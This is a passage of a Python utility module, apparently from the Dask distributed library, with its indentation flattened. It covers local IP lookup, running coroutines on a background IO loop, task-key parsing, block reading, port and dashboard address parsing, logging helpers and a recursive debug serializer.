"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
    ValueError is raised if the interface doesn't exist or if it does not
    have an IPv4 address associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError(f"interface {ifname!r} doesn't have an IPv4 address")
async def All(args, quiet_exceptions=()):
"""Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
async def Any(args, quiet_exceptions=()):
"""Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
class NoOpAwaitable:
"""An awaitable object that always returns None.
Useful to return from a method that can be called in both asynchronous and
synchronous contexts"""
def __await__(self):
async def f():
return None
return f().__await__()
class SyncMethodMixin:
"""
A mixin for adding an `asynchronous` attribute and `sync` method to a class.
Subclasses must define a `loop` attribute for an associated
`tornado.IOLoop`, and may also add a `_asynchronous` attribute indicating
whether the class should default to asynchronous behavior.
"""
@property
def asynchronous(self):
"""Are we running in the event loop?"""
return in_async_call(self.loop, default=getattr(self, "_asynchronous", False))
def sync(self, func, *args, asynchronous=None, callback_timeout=None, **kwargs):
"""Call `func` with `args` synchronously or asynchronously depending on
the calling context"""
callback_timeout = _parse_timedelta(callback_timeout)
if asynchronous is None:
asynchronous = self.asynchronous
if asynchronous:
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
return future
else:
return sync(
self.loop, func, *args, callback_timeout=callback_timeout, **kwargs
)
def in_async_call(loop, default=False):
"""Whether this call is currently within an async call"""
try:
return loop.asyncio_loop is asyncio.get_running_loop()
except RuntimeError:
# No *running* loop in thread. If the event loop isn't running, it
# _could_ be started later in this thread though. Return the default.
if not loop.asyncio_loop.is_running():
return default
return False
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
    Run a coroutine in an IOLoop that is running in a separate thread, blocking
    the calling thread until the coroutine completes.
"""
callback_timeout = _parse_timedelta(callback_timeout, "s")
if loop.asyncio_loop.is_closed():
raise RuntimeError("IOLoop is closed")
e = threading.Event()
main_tid = threading.get_ident()
result = error = future = None # set up non-locals
@gen.coroutine
def f():
nonlocal result, error, future
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
future = asyncio.ensure_future(future)
result = yield future
except Exception:
error = sys.exc_info()
finally:
e.set()
def cancel():
if future is not None:
future.cancel()
def wait(timeout):
try:
return e.wait(timeout)
except KeyboardInterrupt:
loop.add_callback(cancel)
raise
loop.add_callback(f)
if callback_timeout is not None:
if not wait(callback_timeout):
raise TimeoutError(f"timed out after {callback_timeout} s.")
else:
while not e.is_set():
wait(10)
if error:
typ, exc, tb = error
raise exc.with_traceback(tb)
else:
return result
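# A minimal usage sketch for sync() (illustrative only; assumes `loop` is a tornado
# IOLoop whose asyncio loop is already running in another thread, e.g. one managed by
# the LoopRunner class below):
#
#     async def fetch():
#         return 42
#
#     result = sync(loop, fetch)  # blocks the calling thread until fetch() completes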
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops: ClassVar[
weakref.WeakKeyDictionary[IOLoop, tuple[int, LoopRunner | None]]
] = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
if loop is None:
if asynchronous:
self._loop = IOLoop.current()
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
else:
self._loop = loop
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
# run loop forever if it's not running already
try:
if not loop.asyncio_loop.is_running():
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if start_exc[0] is not None and not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError(
f"not an exception: {start_exc[0]!r}",
)
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with suppress(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
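# A minimal usage sketch for LoopRunner (illustrative only; `my_coroutine` is a
# hypothetical coroutine function):
#
#     runner = LoopRunner()            # looks up or creates an IOLoop
#     runner.start()                   # starts the loop in a daemon thread if needed
#     runner.run_sync(my_coroutine)    # equivalent to sync(runner.loop, my_coroutine)
#     runner.stop()                    # reference-counted; only the runner that
#                                      # actually started the loop stops and closes it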
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def is_kernel():
"""Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x) -> str:
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return key_split(x)
elif typ is bytes:
return key_split_group(x.decode())
else:
return "Other"
@contextmanager
def log_errors(pdb=False):
from distributed.comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
"""Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('') # Maps as localhost for binding e.g. 'tcp://:8811'
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
if not hostname:
hostname = "localhost"
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
"""Truncate exception to be about a certain length"""
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def validate_key(k):
"""Validate a key as received on a stream."""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError(f"Unexpected key type {typ} (value: {k!r})")
def _maybe_complex(task):
"""Possibly contains a nested task"""
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def seek_delimiter(file, delimiter, blocksize):
"""Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
def read_block(f, offset, length, delimiter=None):
"""Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2**16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2**16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
        The object to be converted. The following types are handled correctly:
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
elif hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def open_port(host=""):
"""Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path: str):
"""Loads modules for a file (.py, .zip, .egg)"""
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import: list[str] = []
tmp_python_path: str | None = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with suppress(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded: list[ModuleType] = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
"""Number of bytes of a frame or memoryview"""
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def json_load_robust(fn, load=json.load):
"""Reads a JSON file from disk that may be being written as we read"""
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
class DequeHandler(logging.Handler):
"""A logging.Handler that records records into a deque"""
_instances: ClassVar[weakref.WeakSet[DequeHandler]] = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super().__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
"""Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
@functools.lru_cache(1000)
def command_has_keyword(cmd, k):
if cmd is not None:
if isinstance(cmd, str):
try:
from importlib import import_module
cmd = import_module(cmd)
except ImportError:
raise ImportError("Module for command %s is not available" % cmd)
if isinstance(getattr(cmd, "main"), click.core.Command):
cmd = cmd.main
if isinstance(cmd, click.core.Command):
cmd_params = {
p.human_readable_name
for p in cmd.params
if isinstance(p, click.core.Option)
}
return k in cmd_params
return False
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
def _iscoroutinefunction(f):
return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f)
@functools.lru_cache(None)
def _iscoroutinefunction_cached(f):
return _iscoroutinefunction(f)
def iscoroutinefunction(f):
# Attempt to use lru_cache version and fall back to non-cached version if needed
try:
return _iscoroutinefunction_cached(f)
except TypeError: # unhashable type
return _iscoroutinefunction(f)
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > _parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
def parse_ports(port):
"""Parse input port information into list of ports
Parameters
----------
port : int, str, None
Input port or ports. Can be an integer like 8787, a string for a
single port like "8787", a string for a sequential range of ports like
"8000:8200", or None.
Returns
-------
ports : list
List of ports
Examples
--------
A single port can be specified using an integer:
>>> parse_ports(8787)
[8787]
or a string:
>>> parse_ports("8787")
[8787]
A sequential range of ports can be specified by a string which indicates
the first and last ports which should be included in the sequence of ports:
>>> parse_ports("8787:8790")
[8787, 8788, 8789, 8790]
An input of ``None`` is also valid and can be used to indicate that no port
has been specified:
>>> parse_ports(None)
[None]
"""
if isinstance(port, str) and ":" not in port:
port = int(port)
if isinstance(port, (int, type(None))):
ports = [port]
else:
port_start, port_stop = map(int, port.split(":"))
if port_stop <= port_start:
raise ValueError(
"When specifying a range of ports like port_start:port_stop, "
"port_stop must be greater than port_start, but got "
f"{port_start=} and {port_stop=}"
)
ports = list(range(port_start, port_stop + 1))
return ports
is_coroutine_function = iscoroutinefunction
class Log(str):
"""A container for newline-delimited string of log entries"""
def _repr_html_(self):
return get_template("log.html.j2").render(log=self)
class Logs(dict):
"""A container for a dict mapping names to strings of log entries"""
def _repr_html_(self):
return get_template("logs.html.j2").render(logs=self)
def cli_keywords(d: dict, cls=None, cmd=None):
"""Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d : dict
The keywords to convert
cls : callable
The callable that consumes these terms to check them for validity
cmd : string or object
A string with the name of a module, or the module containing a
click-generated command with a "main" function, or the function itself.
It may be used to parse a module's custom arguments (that is, arguments that
are not part of Worker class), such as nworkers from dask-worker CLI or
enable_nvlink from dask-cuda-worker CLI.
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
from dask.utils import typename
if cls or cmd:
for k in d:
if not has_keyword(cls, k) and not command_has_keyword(cmd, k):
if cls and cmd:
raise ValueError(
"Neither class %s or module %s support keyword %s"
% (typename(cls), typename(cmd), k)
)
elif cls:
raise ValueError(
f"Class {typename(cls)} does not support keyword {k}"
)
else:
raise ValueError(
f"Module {typename(cmd)} does not support keyword {k}"
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
(["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()), []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
_offload_executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix="Dask-Offload")
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
"""Return the fully qualified term
Examples
--------
>>> import_term("math.sin") # doctest: +SKIP
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
# Retain context vars while deserializing; see https://bugs.python.org/issue34014
context = contextvars.copy_context()
return await loop.run_in_executor(
_offload_executor, lambda: context.run(fn, *args, **kwargs)
)
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
"""Limited size mapping, evicting the least recently looked-up key when full"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.data.popitem(last=False)
super().__setitem__(key, value)
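# Example behaviour of LRU (illustrative only): with maxsize=2, a lookup refreshes the
# key, so the least recently *looked-up* key is the one evicted on overflow:
#
#     cache = LRU(maxsize=2)
#     cache["a"], cache["b"] = 1, 2
#     cache["a"]        # refreshes "a"
#     cache["c"] = 3    # evicts "b"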
def clean_dashboard_address(addrs: AnyType, default_listen_ip: str = "") -> list[dict]:
"""
Examples
--------
>>> clean_dashboard_address(8787)
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address(":8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("foo:8787")
[{'address': 'foo', 'port': 8787}]
>>> clean_dashboard_address([8787, 8887])
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
>>> clean_dashboard_address(":8787,:8887")
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
"""
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
if isinstance(addrs, str):
addrs = addrs.split(",")
if not isinstance(addrs, list):
addrs = [addrs]
addresses = []
for addr in addrs:
try:
addr = int(addr)
except (TypeError, ValueError):
pass
if isinstance(addr, str):
addr = addr.split(":")
if isinstance(addr, (tuple, list)):
if len(addr) == 2:
host, port = (addr[0], int(addr[1]))
elif len(addr) == 1:
[host], port = addr, 0
else:
raise ValueError(addr)
elif isinstance(addr, int):
host = default_listen_ip
port = addr
addresses.append({"address": host, "port": port})
return addresses
_deprecations = {
"deserialize_for_cli": "dask.config.deserialize",
"serialize_for_cli": "dask.config.serialize",
"format_bytes": "dask.utils.format_bytes",
"format_time": "dask.utils.format_time",
"funcname": "dask.utils.funcname",
"parse_bytes": "dask.utils.parse_bytes",
"parse_timedelta": "dask.utils.parse_timedelta",
"typename": "dask.utils.typename",
"tmpfile": "dask.utils.tmpfile",
}
def __getattr__(name):
if name in _deprecations:
use_instead = _deprecations[name]
warnings.warn(
f"{name} is deprecated and will be removed in a future release. "
f"Please use {use_instead} instead.",
category=FutureWarning,
stacklevel=2,
)
return import_term(use_instead)
else:
raise AttributeError(f"module {__name__} has no attribute {name}")
# Used internally by recursive_to_dict to stop infinite recursion. If an object has
# already been encountered, a string representation will be returned instead. This is
# necessary since we have multiple cyclic referencing data structures.
_recursive_to_dict_seen: ContextVar[set[int]] = ContextVar("_recursive_to_dict_seen")
_to_dict_no_nest_flag = False
def recursive_to_dict(
obj: AnyType, *, exclude: Container[str] = (), members: bool = False
) -> AnyType:
"""Recursively convert arbitrary Python objects to a JSON-serializable
representation. This is intended for debugging purposes only.
The following objects are supported:
list, tuple, set, frozenset, deque, dict, dict_keys, dict_values
Descended into these objects recursively. Python-specific collections are
converted to JSON-friendly variants.
Classes that define ``_to_dict(self, *, exclude: Container[str] = ())``:
Call the method and dump its output
Classes that define ``_to_dict_no_nest(self, *, exclude: Container[str] = ())``:
Like above, but prevents nested calls (see below)
Other Python objects
Dump the output of ``repr()``
Objects already encountered before, regardless of type
Dump the output of ``repr()``. This breaks circular references and shortens the
output.
Parameters
----------
exclude:
A list of attribute names to be excluded from the dump.
This will be forwarded to the objects ``_to_dict`` methods and these methods
are required to accept this parameter.
members:
If True, convert the top-level Python object to a dict of its public members
**``_to_dict_no_nest`` vs. ``_to_dict``**
    The presence of the ``_to_dict_no_nest`` method signals ``recursive_to_dict`` that
    objects defining it are mutually exclusive in the full dict representation,
    regardless of their class: only the outermost such object in a nested structure
    has the method invoked; all others are dumped as their string repr instead, even
    if they were not encountered before.
Example:
.. code-block:: python
>>> class Person:
... def __init__(self, name):
... self.name = name
... self.children = []
... self.pets = []
...
... def _to_dict_no_nest(self, exclude=()):
... return recursive_to_dict(self.__dict__, exclude=exclude)
...
... def __repr__(self):
... return self.name
>>> class Pet:
... def __init__(self, name):
... self.name = name
... self.owners = []
...
... def _to_dict_no_nest(self, exclude=()):
... return recursive_to_dict(self.__dict__, exclude=exclude)
...
... def __repr__(self):
... return self.name
>>> alice = Person("Alice")
>>> bob = Person("Bob")
>>> charlie = Pet("Charlie")
>>> alice.children.append(bob)
>>> alice.pets.append(charlie)
>>> bob.pets.append(charlie)
>>> charlie.owners[:] = [alice, bob]
>>> recursive_to_dict({"people": [alice, bob], "pets": [charlie]})
{
"people": [
{"name": "Alice", "children": ["Bob"], "pets": ["Charlie"]},
{"name": "Bob", "children": [], "pets": ["Charlie"]},
],
"pets": [
{"name": "Charlie", "owners": ["Alice", "Bob"]},
],
}
If we changed the methods to ``_to_dict``, the output would instead be:
.. code-block:: python
        {
            "people": [
                {
                    "name": "Alice",
                    "children": [
                        {
                            "name": "Bob",
                            "children": [],
                            "pets": [{"name": "Charlie", "owners": ["Alice", "Bob"]}],
                        },
                    ],
                    "pets": ["Charlie"],
                },
                "Bob",
            ],
            "pets": ["Charlie"],
        }
Also notice that, if in the future someone will swap the creation of the
``children`` and ``pets`` attributes inside ``Person.__init__``, the output with
``_to_dict`` will change completely whereas the one with ``_to_dict_no_nest`` won't!
"""
if isinstance(obj, (int, float, bool, str)) or obj is None:
return obj
if isinstance(obj, (type, bytes)):
return repr(obj)
if members:
obj = {
k: v
for k, v in inspect.getmembers(obj)
if not k.startswith("_") and k not in exclude and not callable(v)
}
# Prevent infinite recursion
try:
seen = _recursive_to_dict_seen.get()
except LookupError:
seen = set()
seen = seen.copy()
tok = _recursive_to_dict_seen.set(seen)
try:
if id(obj) in seen:
return repr(obj)
if hasattr(obj, "_to_dict_no_nest"):
global _to_dict_no_nest_flag
if _to_dict_no_nest_flag:
return repr(obj)
seen.add(id(obj))
_to_dict_no_nest_flag = True
try:
return obj._to_dict_no_nest(exclude=exclude)
finally:
_to_dict_no_nest_flag = False
seen.add(id(obj))
